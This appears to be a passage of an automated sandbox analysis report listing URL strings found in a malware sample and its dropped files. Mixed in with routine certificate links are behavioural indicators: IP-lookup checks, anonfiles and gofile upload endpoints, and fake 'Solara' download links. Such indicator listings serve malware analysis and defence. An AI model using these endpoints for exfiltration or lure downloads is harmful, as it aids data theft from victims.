                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1405743507.000001DCB591A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-term4-fra2.roblox.com
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6B55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getsolara.dev
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412149958.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB586F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1412898887.000001DCB5E94000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414429279.000001DCB5E84000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460853265.000001DCB5EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nodejs.org
                Source: powershell.exe, 0000000B.00000002.1523088933.000001E36B2F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B281000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6B3A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1462623142.000001DCB6380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393361650.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393090782.000001C12B86F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                Source: Amcache.hve.29.drString found in binary or memory: http://upx.sf.net
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B4AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000002.1504216075.000001C12B87C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390821332.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387713153.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388984719.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388063049.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1391172861.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393941866.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388593417.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390354928.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388313113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1390950904.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388449108.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393465113.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387918677.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387811652.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1393699319.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1388152864.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1459866159.000001DCB5935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nodejs.org
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
                Source: bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C1D000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://99ab5d9c.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
                Source: powershell.exe, 0000000B.00000002.1500577512.000001E35B281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413757581.000001DCB6D3F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1414724101.000001DCB6570000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1413901123.000001DCB6531000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000011.00000002.1605507236.00000254B6C3E000.00000004.00000800.00020000.00000000.sdmp, bound.exe, 00000011.00000000.1421291834.00000254B4B62000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadr#
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1460493286.000001DCB5B30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000003.1408182982.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr~r
